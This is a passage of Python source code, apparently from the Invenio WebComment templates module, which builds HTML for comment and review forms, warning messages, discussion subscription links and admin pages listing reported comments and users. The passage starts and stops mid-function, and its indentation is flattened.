# </select>''' or '''
# </select>''')
#
#form_link = "%(siteurl)s/%(module)s/%(function)s" % link_dic
#form = self.createhiddenform(action=form_link, method="get", text=form, button='Go', recid=recID, p=1)
pages = """
<div>
%(v_label)s %(comments_or_reviews)s %(results_nb_lower)s-%(results_nb_higher)s <br />
%(page_links)s
</div>
""" % \
{'v_label': _("Viewing"),
'page_links': _("Page:") + page_links ,
'comments_or_reviews': reviews and _('review') or _('comment'),
'results_nb_lower': len(comments)>0 and ((page-1) * nb_per_page)+1 or 0,
'results_nb_higher': page == nb_pages and (((page-1) * nb_per_page) + len(comments)) or (page * nb_per_page)}
if nb_pages > 1:
#body = warnings + body + form + pages
body = warnings + body + pages
else:
body = warnings + body
if reviews == 0:
if not user_is_subscribed_to_discussion:
body += '<small>'
body += '<div class="comment-subscribe">' + '<img src="%s/img/mail-icon-12x8.gif" border="0" alt="" />' % CFG_SITE_URL + \
' ' + '<b>' + create_html_link(urlbase=CFG_SITE_URL + '/record/' + \
str(recID) + '/comments/subscribe',
urlargd={},
link_label=_('Subscribe')) + \
'</b>' + ' to this discussion. You will then receive all new comments by email.' + '</div>'
body += '</small><br />'
elif user_can_unsubscribe_from_discussion:
body += '<small>'
body += '<div class="comment-subscribe">' + '<img src="%s/img/mail-icon-12x8.gif" border="0" alt="" />' % CFG_SITE_URL + \
' ' + '<b>' + create_html_link(urlbase=CFG_SITE_URL + '/record/' + \
str(recID) + '/comments/unsubscribe',
urlargd={},
link_label=_('Unsubscribe')) + \
'</b>' + ' from this discussion. You will no longer receive emails about new comments.' + '</div>'
body += '</small><br />'
if can_send_comments:
body += add_comment_or_review
else:
body += '<br/><em>' + _("You are not authorized to comment or review.") + '</em>'
return '<div style="margin-left:10px;margin-right:10px;">' + body + '</div>'
def create_messaging_link(self, to, display_name, ln=CFG_SITE_LANG):
"""prints a link to the messaging system"""
link = "%s/yourmessages/write?msg_to=%s&ln=%s" % (CFG_SITE_URL, to, ln)
if to:
return '<a href="%s" class="maillink">%s</a>' % (link, display_name)
else:
return display_name
def createhiddenform(self, action="", method="get", text="", button="confirm", cnfrm='', **hidden):
"""
create select with hidden values and submit button
@param action: name of the action to perform on submit
@param method: 'get' or 'post'
@param text: additional text, can also be used to add non hidden input
@param button: value/caption on the submit button
@param cnfrm: if given, must check checkbox to confirm
@param **hidden: dictionary with name=value pairs for hidden input
@return: html form
"""
output = """
<form action="%s" method="%s">""" % (action, method.lower().strip() in ['get', 'post'] and method or 'get')
output += """
<table style="width:90%">
<tr>
<td style="vertical-align: top">
"""
output += text + '\n'
if cnfrm:
output += """
<input type="checkbox" name="confirm" value="1" />"""
for key in hidden.keys():
if type(hidden[key]) is list:
for value in hidden[key]:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, value)
else:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, hidden[key])
output += """
</td>
</tr>
<tr>
<td>"""
output += """
<input class="adminbutton" type="submit" value="%s" />""" % (button, )
output += """
</td>
</tr>
</table>
</form>"""
return output
def create_write_comment_hiddenform(self, action="", method="get", text="", button="confirm", cnfrm='', enctype='', **hidden):
"""
create select with hidden values and submit button
@param action: name of the action to perform on submit
@param method: 'get' or 'post'
@param text: additional text, can also be used to add non hidden input
@param button: value/caption on the submit button
@param cnfrm: if given, must check checkbox to confirm
@param **hidden: dictionary with name=value pairs for hidden input
@return: html form
"""
enctype_attr = ''
if enctype:
enctype_attr = 'enctype=' + enctype
output = """
<form action="%s" method="%s" %s>""" % (action, method.lower().strip() in ['get', 'post'] and method or 'get', enctype_attr)
if cnfrm:
output += """
<input type="checkbox" name="confirm" value="1" />"""
for key in hidden.keys():
if type(hidden[key]) is list:
for value in hidden[key]:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, value)
else:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, hidden[key])
output += text + '\n'
output += """
</form>"""
return output
def tmpl_warnings(self, warnings, ln=CFG_SITE_LANG):
"""
Prepare the warnings list
@param warnings: list of warning tuples (warning_msg, arg1, arg2, etc)
@return: html string of warnings
"""
red_text_warnings = ['WRN_WEBCOMMENT_FEEDBACK_NOT_RECORDED',
'WRN_WEBCOMMENT_ALREADY_VOTED']
green_text_warnings = ['WRN_WEBCOMMENT_FEEDBACK_RECORDED',
'WRN_WEBCOMMENT_SUBSCRIBED',
'WRN_WEBCOMMENT_UNSUBSCRIBED']
from invenio.errorlib import get_msgs_for_code_list
span_class = 'important'
out = ""
if type(warnings) is not list:
warnings = [warnings]
if len(warnings) > 0:
warnings_parsed = get_msgs_for_code_list(warnings, 'warning', ln)
for (warning_code, warning_text) in warnings_parsed:
if not warning_code.startswith('WRN'):
#display only warnings that begin with WRN to user
continue
if warning_code in red_text_warnings:
span_class = 'important'
elif warning_code in green_text_warnings:
span_class = 'exampleleader'
else:
span_class = 'important'
out += '''
<span class="%(span_class)s">%(warning)s</span><br />''' % \
{ 'span_class' : span_class,
'warning' : warning_text }
return out
else:
return ""
def tmpl_add_comment_form(self, recID, uid, nickname, ln, msg,
warnings, textual_msg=None, can_attach_files=False,
user_is_subscribed_to_discussion=False, reply_to=None):
"""
Add form for comments
@param recID: record id
@param uid: user id
@param ln: language
@param msg: comment body contents for when refreshing due to
warning, or when replying to a comment
@param textual_msg: same as 'msg', but contains the textual
version in case user cannot display FCKeditor
@param warnings: list of warning tuples (warning_msg, color)
@param can_attach_files: if user can upload attach file to record or not
@param user_is_subscribed_to_discussion: True if user already receives new comments by email
@param reply_to: the ID of the comment we are replying to. None if not replying
@return html add comment form
"""
_ = gettext_set_language(ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'add',
'arguments' : 'ln=%s&action=%s' % (ln, 'SUBMIT'),
'recID' : recID}
if textual_msg is None:
textual_msg = msg
# FIXME a cleaner handling of nicknames is needed.
if not nickname:
(uid, nickname, display) = get_user_info(uid)
if nickname:
note = _("Note: Your nickname, %s, will be displayed as author of this comment.") % ('<i>' + nickname + '</i>')
else:
(uid, nickname, display) = get_user_info(uid)
link = '<a href="%s/youraccount/edit">' % CFG_SITE_SECURE_URL
note = _("Note: you have not %(x_url_open)sdefined your nickname%(x_url_close)s. %(x_nickname)s will be displayed as the author of this comment.") % \
{'x_url_open': link,
'x_url_close': '</a>',
'x_nickname': ' <br /><i>' + display + '</i>'}
if not CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR:
note += '<br />' + ' '*10 + cgi.escape('You can use some HTML tags: <a href>, <strong>, <blockquote>, <br />, <p>, <em>, <ul>, <li>, <b>, <i>')
#from invenio.search_engine import print_record
#record_details = print_record(recID=recID, format='hb', ln=ln)
warnings = self.tmpl_warnings(warnings, ln)
# Prepare file upload settings. We must enable file upload in
# the fckeditor + a simple file upload interface (independant from editor)
file_upload_url = None
simple_attach_file_interface = ''
if isGuestUser(uid):
simple_attach_file_interface = "<small><em>%s</em></small><br/>" % _("Once logged in, authorized users can also attach files.")
if can_attach_files:
# Note that files can be uploaded only when user is logged in
#file_upload_url = '%s/record/%i/comments/attachments/put' % \
# (CFG_SITE_URL, recID)
simple_attach_file_interface = '''
<div id="uploadcommentattachmentsinterface">
<small>%(attach_msg)s: <em>(%(nb_files_limit_msg)s. %(file_size_limit_msg)s)</em></small><br />
<input class="multi max-%(CFG_WEBCOMMENT_MAX_ATTACHED_FILES)s" type="file" name="commentattachment[]"/><br />
<noscript>
<input type="file" name="commentattachment[]" /><br />
</noscript>
</div>
''' % \
{'CFG_WEBCOMMENT_MAX_ATTACHED_FILES': CFG_WEBCOMMENT_MAX_ATTACHED_FILES,
'attach_msg': CFG_WEBCOMMENT_MAX_ATTACHED_FILES == 1 and _("Optionally, attach a file to this comment") or \
_("Optionally, attach files to this comment"),
'nb_files_limit_msg': _("Max one file") and CFG_WEBCOMMENT_MAX_ATTACHED_FILES == 1 or \
_("Max %i files") % CFG_WEBCOMMENT_MAX_ATTACHED_FILES,
'file_size_limit_msg': CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE > 0 and _("Max %(x_nb_bytes)s per file") % {'x_nb_bytes': (CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE < 1024*1024 and (str(CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE/1024) + 'KB') or (str(CFG_WEBCOMMENT_MAX_ATTACHMENT_SIZE/(1024*1024)) + 'MB'))} or ''}
editor = get_html_text_editor(name='msg',
content=msg,
textual_content=textual_msg,
width='100%',
height='400px',
enabled=CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR,
file_upload_url=file_upload_url,
toolbar_set = "WebComment")
subscribe_to_discussion = ''
if not user_is_subscribed_to_discussion:
# Offer to subscribe to discussion
subscribe_to_discussion = '<small><input type="checkbox" name="subscribe" id="subscribe"/><label for="subscribe">%s</label></small>' % _("Send me an email when a new comment is posted")
form = """<div id="comment-write"><h2>%(add_comment)s</h2>
%(editor)s
<br />
%(simple_attach_file_interface)s
<span class="reportabuse">%(note)s</span>
<div class="submit-area">
%(subscribe_to_discussion)s<br />
<input class="adminbutton" type="submit" value="Add comment" />
%(reply_to)s
</div>
""" % {'note': note,
'record_label': _("Article") + ":",
'comment_label': _("Comment") + ":",
'add_comment': _('Add comment'),
'editor': editor,
'subscribe_to_discussion': subscribe_to_discussion,
'reply_to': reply_to and '<input type="hidden" name="comid" value="%s"/>' % reply_to or '',
'simple_attach_file_interface': simple_attach_file_interface}
form_link = "%(siteurl)s/record/%(recID)s/comments/%(function)s?%(arguments)s" % link_dic
form = self.create_write_comment_hiddenform(action=form_link, method="post", text=form, button='Add comment',
enctype='multipart/form-data')
form += '</div>'
return warnings + form
def tmpl_add_comment_form_with_ranking(self, recID, uid, nickname, ln, msg, score, note,
warnings, textual_msg=None, show_title_p=False,
can_attach_files=False):
"""
Add form for reviews
@param recID: record id
@param uid: user id
@param ln: language
@param msg: comment body contents for when refreshing due to warning
@param textual_msg: the textual version of 'msg' when user cannot display FCKeditor
@param score: review score
@param note: review title
@param warnings: list of warning tuples (warning_msg, color)
@param show_title_p: if True, prefix the form with "Add Review" as title
@param can_attach_files: if user can upload attach file to record or not
@return: html add review form
"""
_ = gettext_set_language(ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'add',
'arguments' : 'ln=%s&action=%s' % (ln, 'SUBMIT'),
'recID' : recID}
warnings = self.tmpl_warnings(warnings, ln)
if textual_msg is None:
textual_msg = msg
#from search_engine import print_record
#record_details = print_record(recID=recID, format='hb', ln=ln)
if nickname:
note_label = _("Note: Your nickname, %s, will be displayed as the author of this review.")
note_label %= ('<i>' + nickname + '</i>')
else:
(uid, nickname, display) = get_user_info(uid)
link = '<a href="%s/youraccount/edit">' % CFG_SITE_SECURE_URL
note_label = _("Note: you have not %(x_url_open)sdefined your nickname%(x_url_close)s. %(x_nickname)s will be displayed as the author of this comment.") % \
{'x_url_open': link,
'x_url_close': '</a>',
'x_nickname': ' <br /><i>' + display + '</i>'}
selected0 = ''
selected1 = ''
selected2 = ''
selected3 = ''
selected4 = ''
selected5 = ''
if score == 0:
selected0 = ' selected="selected"'
elif score == 1:
selected1 = ' selected="selected"'
elif score == 2:
selected2 = ' selected="selected"'
elif score == 3:
selected3 = ' selected="selected"'
elif score == 4:
selected4 = ' selected="selected"'
elif score == 5:
selected5 = ' selected="selected"'
## file_upload_url = None
## if can_attach_files:
## file_upload_url = '%s/record/%i/comments/attachments/put' % \
## (CFG_SITE_URL, recID)
editor = get_html_text_editor(name='msg',
content=msg,
textual_content=msg,
width='90%',
height='400px',
enabled=CFG_WEBCOMMENT_USE_RICH_TEXT_EDITOR,
# file_upload_url=file_upload_url,
toolbar_set = "WebComment")
form = """%(add_review)s
<table style="width: 100%%">
<tr>
<td style="padding-bottom: 10px;">%(rate_label)s:
<select name=\"score\" size=\"1\">
<option value=\"0\"%(selected0)s>-%(select_label)s-</option>
<option value=\"5\"%(selected5)s>***** (best)</option>
<option value=\"4\"%(selected4)s>****</option>
<option value=\"3\"%(selected3)s>***</option>
<option value=\"2\"%(selected2)s>**</option>
<option value=\"1\"%(selected1)s>* (worst)</option>
</select>
</td>
</tr>
<tr>
<td>%(title_label)s:</td>
</tr>
<tr>
<td style="padding-bottom: 10px;">
<input type="text" name="note" maxlength="250" style="width:90%%" value="%(note)s" />
</td>
</tr>
<tr>
<td>%(write_label)s:</td>
</tr>
<tr>
<td>
%(editor)s
</td>
</tr>
<tr>
<td class="reportabuse">%(note_label)s</td></tr>
</table>
""" % {'article_label': _('Article'),
'rate_label': _("Rate this article"),
'select_label': _("Select a score"),
'title_label': _("Give a title to your review"),
'write_label': _("Write your review"),
'note_label': note_label,
'note' : note!='' and note or "",
'msg' : msg!='' and msg or "",
#'record' : record_details
'add_review': show_title_p and ('<h2>'+_('Add review')+'</h2>') or '',
'selected0': selected0,
'selected1': selected1,
'selected2': selected2,
'selected3': selected3,
'selected4': selected4,
'selected5': selected5,
'editor': editor,
}
form_link = "%(siteurl)s/record/%(recID)s/reviews/%(function)s?%(arguments)s" % link_dic
form = self.createhiddenform(action=form_link, method="post", text=form, button=_('Add Review'))
return warnings + form
def tmpl_add_comment_successful(self, recID, ln, reviews, warnings, success):
"""
@param recID: record id
@param ln: language
@return: html page of successfully added comment/review
"""
_ = gettext_set_language(ln)
link_dic = { 'siteurl' : CFG_SITE_URL,
'module' : 'comments',
'function' : 'display',
'arguments' : 'ln=%s&do=od' % ln,
'recID' : recID,
'discussion': reviews == 1 and 'reviews' or 'comments'}
link = "%(siteurl)s/record/%(recID)s/%(discussion)s/%(function)s?%(arguments)s" % link_dic
if warnings:
out = self.tmpl_warnings(warnings, ln) + '<br /><br />'
else:
if reviews:
out = _("Your review was successfully added.") + '<br /><br />'
else:
out = _("Your comment was successfully added.") + '<br /><br />'
link += "#%s" % success
out += '<a href="%s">' % link
out += _('Back to record') + '</a>'
return out
def tmpl_create_multiple_actions_form(self,
form_name="",
form_action="",
method="get",
action_display={},
action_field_name="",
button_label="",
button_name="",
content="",
**hidden):
""" Creates an HTML form with a multiple choice of actions and a button to select it.
@param form_action: link to the receiver of the formular
@param form_name: name of the HTML formular
@param method: either 'GET' or 'POST'
@param action_display: dictionary of actions.
action is HTML name (name of action)
display is the string provided in the popup
@param action_field_name: html name of action field
@param button_label: what's written on the button
@param button_name: html name of the button
@param content: what's inside te formular
@param **hidden: dictionary of name/value pairs of hidden fields.
"""
output = """
<form action="%s" method="%s">""" % (form_action, method)
output += """
<table>
<tr>
<td style="vertical-align: top" colspan="2">
"""
output += content + '\n'
for key in hidden.keys():
if type(hidden[key]) is list:
for value in hidden[key]:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, value)
else:
output += """
<input type="hidden" name="%s" value="%s" />""" % (key, hidden[key])
output += """
</td>
</tr>
<tr>
<td style="text-align:right;">"""
if type(action_display) is dict and len(action_display.keys()):
output += """
<select name="%s">""" % action_field_name
for (key, value) in action_display.items():
output += """
<option value="%s">%s</option>""" % (key, value)
output += """
</select>"""
output += """
</td>
<td style="text-align:left;">
<input class="adminbutton" type="submit" value="%s" name="%s"/>""" % (button_label, button_name)
output += """
</td>
</tr>
</table>
</form>"""
return output
def tmpl_admin_index(self, ln):
"""
Index page
"""
# load the right message language
_ = gettext_set_language(ln)
out = '<ol>'
if CFG_WEBCOMMENT_ALLOW_COMMENTS or CFG_WEBCOMMENT_ALLOW_REVIEWS:
if CFG_WEBCOMMENT_ALLOW_COMMENTS:
out += '<h3>Comments status</h3>'
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/hot?ln=%(ln)s&comments=1">%(hot_cmt_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'hot_cmt_label': _("View most commented records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/latest?ln=%(ln)s&comments=1">%(latest_cmt_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'latest_cmt_label': _("View latest commented records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/comments?ln=%(ln)s&reviews=0">%(reported_cmt_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'reported_cmt_label': _("View all comments reported as abuse")}
if CFG_WEBCOMMENT_ALLOW_REVIEWS:
out += '<h3>Reviews status</h3>'
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/hot?ln=%(ln)s&comments=0">%(hot_rev_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'hot_rev_label': _("View most reviewed records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/latest?ln=%(ln)s&comments=0">%(latest_rev_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'latest_rev_label': _("View latest reviewed records")}
out += '<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/comments?ln=%(ln)s&reviews=1">%(reported_rev_label)s</a></li>' % \
{'siteurl': CFG_SITE_URL, 'ln': ln, 'reported_rev_label': _("View all reviews reported as abuse")}
#<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/delete?ln=%(ln)s&comid=-1">%(delete_label)s</a></li>
out +="""
<h3>General</h3>
<li><a href="%(siteurl)s/admin/webcomment/webcommentadmin.py/users?ln=%(ln)s">%(view_users)s</a></li>
<li><a href="%(siteurl)s/help/admin/webcomment-admin-guide">%(guide)s</a></li>
""" % {'siteurl' : CFG_SITE_URL,
#'delete_label': _("Delete/Undelete comment(s) or suppress abuse report(s)"),
'view_users': _("View all users who have been reported"),
'ln' : ln,
'guide' : _("Guide")}
else:
out += _("Comments and reviews are disabled") + '<br />'
out += '</ol>'
from invenio.bibrankadminlib import addadminbox
return addadminbox('<b>%s</b>'% _("Menu"), [out])
def tmpl_admin_delete_form(self, ln, warnings):
"""
Display admin interface to fetch list of records to delete
@param warnings: list of warning_tuples where warning_tuple is (warning_message, text_color)
see tmpl_warnings, color is optional
"""
# load the right message language
_ = gettext_set_language(ln)
warnings = self.tmpl_warnings(warnings, ln)
out = '''
<br />
%s<br />
<br />'''% _("Please enter the ID of the comment/review so that you can view it before deciding whether to delete it or not")
form = '''
<table>
<tr>
<td>%s</td>
<td><input type=text name="comid" size="10" maxlength="10" value="" /></td>
</tr>
<tr>
<td><br /></td>
<tr>
</table>
<br />
%s <br/>
<br />
<table>
<tr>
<td>%s</td>
<td><input type=text name="recid" size="10" maxlength="10" value="" /></td>
</tr>
<tr>
<td><br /></td>
<tr>
</table>
<br />
''' % (_("Comment ID:"),
_("Or enter a record ID to list all the associated comments/reviews:"),
_("Record ID:"))
form_link = "%s/admin/webcomment/webcommentadmin.py/delete?ln=%s" % (CFG_SITE_URL, ln)
form = self.createhiddenform(action=form_link, method="get", text=form, button=_('View Comment'))
return warnings + out + form
def tmpl_admin_users(self, ln, users_data):
"""
@param users_data: tuple of ct, i.e. (ct, ct, ...)
where ct is a tuple (total_number_reported, total_comments_reported, total_reviews_reported, total_nb_votes_yes_of_reported,
total_nb_votes_total_of_reported, user_id, user_email, user_nickname)
sorted by order of ct having highest total_number_reported
"""
_ = gettext_set_language(ln)
u_reports = 0
u_comment_reports = 1
u_reviews_reports = 2
u_nb_votes_yes = 3
u_nb_votes_total = 4
u_uid = 5
u_email = 6
u_nickname = 7
if not users_data:
return self.tmpl_warnings([(_("There have been no reports so far."), 'green')])
user_rows = ""
for utuple in users_data:
com_label = _("View all %s reported comments") % utuple[u_comment_reports]
com_link = '''<a href="%s/admin/webcomment/webcommentadmin.py/comments?ln=%s&uid=%s&reviews=0">%s</a><br />''' % \
(CFG_SITE_URL, ln, utuple[u_uid], com_label)
rev_label = _("View all %s reported reviews") % utuple[u_reviews_reports]
rev_link = '''<a href="%s/admin/webcomment/webcommentadmin.py/comments?ln=%s&uid=%s&reviews=1">%s</a>''' % \
(CFG_SITE_URL, ln, utuple[u_uid], rev_label)
if not utuple[u_nickname]:
user_info = get_user_info(utuple[u_uid])
nickname = user_info[2]
else:
nickname = utuple[u_nickname]
if CFG_WEBCOMMENT_ALLOW_REVIEWS:
review_row = """
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>"""
review_row %= (utuple[u_nb_votes_yes],
utuple[u_nb_votes_total] - utuple[u_nb_votes_yes],
utuple[u_nb_votes_total])
else:
review_row = ''
user_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(nickname)s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(email)s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(uid)s</td>%(review_row)s
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray; font-weight: bold;">%(reports)s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%(com_link)s%(rev_link)s</td>
</tr>""" % { 'nickname' : nickname,
'email' : utuple[u_email],
'uid' : utuple[u_uid],
'reports' : utuple[u_reports],
'review_row': review_row,
'siteurl' : CFG_SITE_URL,
'ln' : ln,
'com_link' : CFG_WEBCOMMENT_ALLOW_COMMENTS and com_link or "",
'rev_link' : CFG_WEBCOMMENT_ALLOW_REVIEWS and rev_link or ""
}
out = "<br />"
out += _("Here is a list, sorted by total number of reports, of all users who have had a comment reported at least once.")
out += """
<br />
<br />
<table class="admin_wvar" style="width: 100%%;">
<thead>
<tr class="adminheaderleft">
<th>"""
out += _("Nickname") + '</th>\n'
out += '<th>' + _("Email") + '</th>\n'
out += '<th>' + _("User ID") + '</th>\n'
if CFG_WEBCOMMENT_ALLOW_REVIEWS > 0:
out += '<th>' + _("Number positive votes") + '</th>\n'
out += '<th>' + _("Number negative votes") + '</th>\n'
out += '<th>' + _("Total number votes") + '</th>\n'
out += '<th>' + _("Total number of reports") + '</th>\n'
out += '<th>' + _("View all user's reported comments/reviews") + '</th>\n'
out += """
</tr>
</thead>
<tbody>%s
</tbody>
</table>
""" % user_rows
return out
def tmpl_admin_select_comment_checkbox(self, cmt_id):
""" outputs a checkbox named "comidXX" where XX is cmt_id """
return '<input type="checkbox" name="comid%i" />' % int(cmt_id)
def tmpl_admin_user_info(self, ln, nickname, uid, email):
""" prepares informations about a user"""
_ = gettext_set_language(ln)
out = """
%(nickname_label)s: %(messaging)s<br />
%(uid_label)s: %(uid)i<br />
%(email_label)s: <a href="mailto:%(email)s">%(email)s</a>"""
out %= {'nickname_label': _("Nickname"),
'messaging': self.create_messaging_link(uid, nickname, ln),
'uid_label': _("User ID"),
'uid': int(uid),
'email_label': _("Email"),
'email': email}
return out
def tmpl_admin_review_info(self, ln, reviews, nb_reports, cmt_id, rec_id, status):
""" outputs information about a review """
_ = gettext_set_language(ln)
if reviews:
reported_label = _("This review has been reported %i times")
else:
reported_label = _("This comment has been reported %i times")
reported_label %= int(nb_reports)
out = """
%(reported_label)s<br />
<a href="%(siteurl)s/record/%(rec_id)i?ln=%(ln)s">%(rec_id_label)s</a><br />
%(cmt_id_label)s"""
out %= {'reported_label': reported_label,
'rec_id_label': _("Record") + ' #' + str(rec_id),
'siteurl': CFG_SITE_URL,
'rec_id': int(rec_id),
'cmt_id_label': _("Comment") + ' #' + str(cmt_id),
'ln': ln}
if status in ['dm', 'da']:
out += '<br /><div style="color:red;">Marked as deleted</div>'
return out
def tmpl_admin_latest(self, ln, comment_data, comments, error, user_collections, collection):
"""
@param comment_data: same type of tuple as that
which is return by webcommentadminlib.py/query_get_latest i.e.
tuple (nickname, uid, date_creation, body, id) if latest comments or
tuple (nickname, uid, date_creation, body, star_score, id) if latest reviews
"""
_ = gettext_set_language(ln)
out = """
<script type='text/javascript'>
function collectionChange()
{
document.collection_form.submit();
}
</script>
"""
out += '<form method="get" name="collection_form" action="%s/admin/webcomment/webcommentadmin.py/latest?ln=%s&comments=%s">' % (CFG_SITE_URL, ln, comments)
out += '<input type="hidden" name="ln" value=%s>' % ln
out += '<input type="hidden" name="comments" value=%s>' % comments
out += '<div> Filter by collection: <select name="collection" onchange="javascript:collectionChange();">'
for collection_name in user_collections:
if collection_name == collection:
out += '<option "SELECTED" value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
else:
out += '<option value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
out += '</select></div></form><br />'
if error == 1:
out += "<i>User is not authorized to view such collection.</i><br />"
return out
elif error == 2:
out += "<i>There are no %s for this collection.</i><br />" % (comments and 'comments' or 'reviews')
return out
out += """
<ol>
"""
for (cmt_tuple, meta_data) in comment_data:
bibrec_id = meta_data[3]
content = format_record(bibrec_id, "hs")
if not comments:
out += """
<li> %(content)s <br/> <span class="moreinfo"> <a class="moreinfo" href=%(comment_url)s> reviewed by %(user)s</a>
(%(stars)s) \"%(body)s\" on <i> %(date)s </i></li> </span> <br/>
""" % {'content': content,
'comment_url': CFG_SITE_URL + '/record/' + str(bibrec_id) + '/reviews',
'user':cmt_tuple[0] ,
'stars': '*' * int(cmt_tuple[4]) ,
'body': cmt_tuple[3][:20] + '...',
'date': cmt_tuple[2]}
else:
out += """
<li> %(content)s <br/> <span class="moreinfo"> <a class="moreinfo" href=%(comment_url)s> commented by %(user)s</a>,
\"%(body)s\" on <i> %(date)s </i></li> </span> <br/>
""" % {'content': content,
'comment_url': CFG_SITE_URL + '/record/' + str(bibrec_id) + '/comments',
'user':cmt_tuple[0] ,
'body': cmt_tuple[3][:20] + '...',
'date': cmt_tuple[2]}
out += """</ol>"""
return out
def tmpl_admin_hot(self, ln, comment_data, comments, error, user_collections, collection):
"""
@param comment_data: same type of tuple as that
which is return by webcommentadminlib.py/query_get_hot i.e.
tuple (id_bibrec, date_last_comment, users, count)
"""
_ = gettext_set_language(ln)
out = """
<script type='text/javascript'>
function collectionChange()
{
document.collection_form.submit();
}
</script>
"""
out += '<form method="get" name="collection_form" action="%s/admin/webcomment/webcommentadmin.py/hot?ln=%s&comments=%s">' % (CFG_SITE_URL, ln, comments)
out += '<input type="hidden" name="ln" value=%s>' % ln
out += '<input type="hidden" name="comments" value=%s>' % comments
out += '<div> Filter by collection: <select name="collection" onchange="javascript:collectionChange();">'
for collection_name in user_collections:
if collection_name == collection:
out += '<option "SELECTED" value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
else:
out += '<option value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
out += '</select></div></form><br />'
if error == 1:
out += "<i>User is not authorized to view such collection.</i><br />"
return out
elif error == 2:
out += "<i>There are no %s for this collection.</i><br />" % (comments and 'comments' or 'reviews')
return out
for cmt_tuple in comment_data:
bibrec_id = cmt_tuple[0]
content = format_record(bibrec_id, "hs")
last_comment_date = cmt_tuple[1]
total_users = cmt_tuple[2]
total_comments = cmt_tuple[3]
if comments:
comment_url = CFG_SITE_URL + '/record/' + str(bibrec_id) + '/comments'
str_comment = int(total_comments) > 1 and 'comments' or 'comment'
else:
comment_url = CFG_SITE_URL + '/record/' + str(bibrec_id) + '/reviews'
str_comment = int(total_comments) > 1 and 'reviews' or 'review'
out += """
<li> %(content)s <br/> <span class="moreinfo"> <a class="moreinfo" href=%(comment_url)s> %(total_comments)s
%(str_comment)s</a>
(%(total_users)s %(user)s), latest on <i> %(last_comment_date)s </i></li> </span> <br/>
""" % {'content': content,
'comment_url': comment_url ,
'total_comments': total_comments,
'str_comment': str_comment,
'total_users': total_users,
'user': int(total_users) > 1 and 'users' or 'user',
'last_comment_date': last_comment_date}
out += """</ol>"""
return out
def tmpl_admin_comments(self, ln, uid, comID, recID, comment_data, reviews, error, user_collections, collection):
"""
@param comment_data: same type of tuple as that
which is returned by webcomment.py/query_retrieve_comments_or_remarks i.e.
tuple of comment where comment is
tuple (nickname,
date_creation,
body,
id) if ranking disabled or
tuple (nickname,
date_creation,
body,
nb_votes_yes,
nb_votes_total,
star_score,
title,
id)
"""
_ = gettext_set_language(ln)
coll_form = """
<script type='text/javascript'>
function collectionChange()
{
document.collection_form.submit();
}
</script>
"""
coll_form += '<form method="get" name="collection_form" action="%s/admin/webcomment/webcommentadmin.py/comments?ln=%s&reviews=%s">' % (CFG_SITE_URL, ln, reviews)
coll_form += '<input type="hidden" name="ln" value=%s>' % ln
coll_form += '<input type="hidden" name="reviews" value=%s>' % reviews
coll_form += '<div> Filter by collection: <select name="collection" onchange="javascript:collectionChange();">'
for collection_name in user_collections:
if collection_name == collection:
coll_form += '<option "SELECTED" value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
else:
coll_form += '<option value="%(collection_name)s">%(collection_name)s</option>' % {'collection_name': cgi.escape(collection_name)}
coll_form += '</select></div></form><br />'
if error == 1:
coll_form += "<i>User is not authorized to view such collection.</i><br />"
return coll_form
elif error == 2:
coll_form += "<i>There are no %s for this collection.</i><br />" % (reviews and 'reviews' or 'comments')
return coll_form
comments = []
comments_info = []
checkboxes = []
users = []
for (cmt_tuple, meta_data) in comment_data:
if reviews:
comments.append(self.tmpl_get_comment_with_ranking(None,#request object
ln,
cmt_tuple[0],#nickname
cmt_tuple[1],#userid
cmt_tuple[2],#date_creation
cmt_tuple[3],#body
cmt_tuple[9],#status
0,
cmt_tuple[5],#nb_votes_total
cmt_tuple[4],#nb_votes_yes
cmt_tuple[6],#star_score
cmt_tuple[7]))#title
else:
comments.append(self.tmpl_get_comment_without_ranking(None,#request object
ln,
cmt_tuple[0],#nickname
cmt_tuple[1],#userid
cmt_tuple[2],#date_creation
